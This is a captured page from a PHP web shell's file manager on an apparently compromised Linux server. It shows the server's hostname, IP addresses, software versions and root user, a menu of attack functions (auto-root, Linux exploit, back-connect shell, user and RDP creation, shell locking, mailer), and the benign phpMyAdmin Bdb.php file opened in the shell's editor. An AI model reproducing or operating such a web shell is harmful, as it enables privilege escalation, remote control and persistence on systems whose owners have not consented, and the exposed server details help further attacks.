Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
libraries /
engines /
[ HOME SHELL ]
Name
Size
Permission
Action
Bdb.php
1.91
KB
-rw-r--r--
Berkeleydb.php
256
B
-rw-r--r--
Binlog.php
548
B
-rw-r--r--
Innobase.php
262
B
-rw-r--r--
Innodb.php
13.71
KB
-rw-r--r--
Memory.php
644
B
-rw-r--r--
Merge.php
295
B
-rw-r--r--
Mrg_Myisam.php
510
B
-rw-r--r--
Myisam.php
3.33
KB
-rw-r--r--
Ndbcluster.php
1.06
KB
-rw-r--r--
Pbxt.php
7.08
KB
-rw-r--r--
Performance_Schema.php
584
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Bdb.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * The BDB storage engine * * @package PhpMyAdmin-Engines */ namespace PMA\libraries\engines; use PMA\libraries\StorageEngine; /** * The BDB storage engine * * @package PhpMyAdmin-Engines */ class Bdb extends StorageEngine { /** * Returns array with variable names related to this storage engine * * @return array variable names */ public function getVariables() { return array( 'version_bdb' => array( 'title' => __('Version information'), ), 'bdb_cache_size' => array( 'type' => PMA_ENGINE_DETAILS_TYPE_SIZE, ), 'bdb_home' => array(), 'bdb_log_buffer_size' => array( 'type' => PMA_ENGINE_DETAILS_TYPE_SIZE, ), 'bdb_logdir' => array(), 'bdb_max_lock' => array( 'type' => PMA_ENGINE_DETAILS_TYPE_NUMERIC, ), 'bdb_shared_data' => array(), 'bdb_tmpdir' => array(), 'bdb_data_direct' => array(), 'bdb_lock_detect' => array(), 'bdb_log_direct' => array(), 'bdb_no_recover' => array(), 'bdb_no_sync' => array(), 'skip_sync_bdb_logs' => array(), 'sync_bdb_logs' => array(), ); } /** * Returns the pattern to be used in the query for SQL variables * related to this storage engine * * @return string LIKE pattern */ public function getVariablesLikePattern() { return '%bdb%'; } /** * returns string with filename for the MySQL helppage * about this storage engine * * @return string mysql helppage filename */ public function getMysqlHelpPage() { return 'bdb'; } }
Close